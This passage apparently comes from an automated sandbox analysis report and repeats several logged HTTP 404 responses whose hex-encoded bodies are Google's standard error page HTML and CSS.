65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
